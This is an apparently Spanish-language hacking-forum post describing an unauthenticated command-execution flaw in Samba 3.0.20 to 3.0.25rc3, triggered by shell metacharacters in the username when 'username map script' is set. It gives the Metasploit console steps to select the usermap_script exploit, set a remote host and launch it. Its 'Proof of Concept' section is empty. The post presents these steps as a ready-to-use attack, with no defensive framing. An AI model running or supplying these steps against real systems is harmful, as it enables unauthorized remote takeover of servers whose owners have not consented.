Samba "username map script" Command Execution

Iniciado por 0xZANUT, Enero 01, 2017, 08:57:05 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Samba "username map script" Command Execution


Este módulo explota una vulnerabilidad de ejecución de comandos en las versiones 3.0.20 a 3.0.25rc3 de Samba cuando se utiliza la opción de configuración "username map script" que no es el valor predeterminado. Al especificar un nombre de usuario que contiene caracteres meta de shell, los atacantes pueden ejecutar comandos arbitrarios. No se necesita autenticación para explotar esta vulnerabilidad ya que esta opción se utiliza para asignar nombres de usuario antes de la autenticación.

Forma de uso


Código: php
      msf > use exploit/multi/samba/usermap_script
      msf exploit(usermap_script) > show options
            ...show options
      msf exploit(usermap_script) > set RHOST <rhost-id>
      msf exploit(usermap_script) > exploit
            ...now wait


Proof of Concept






Atentamente, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta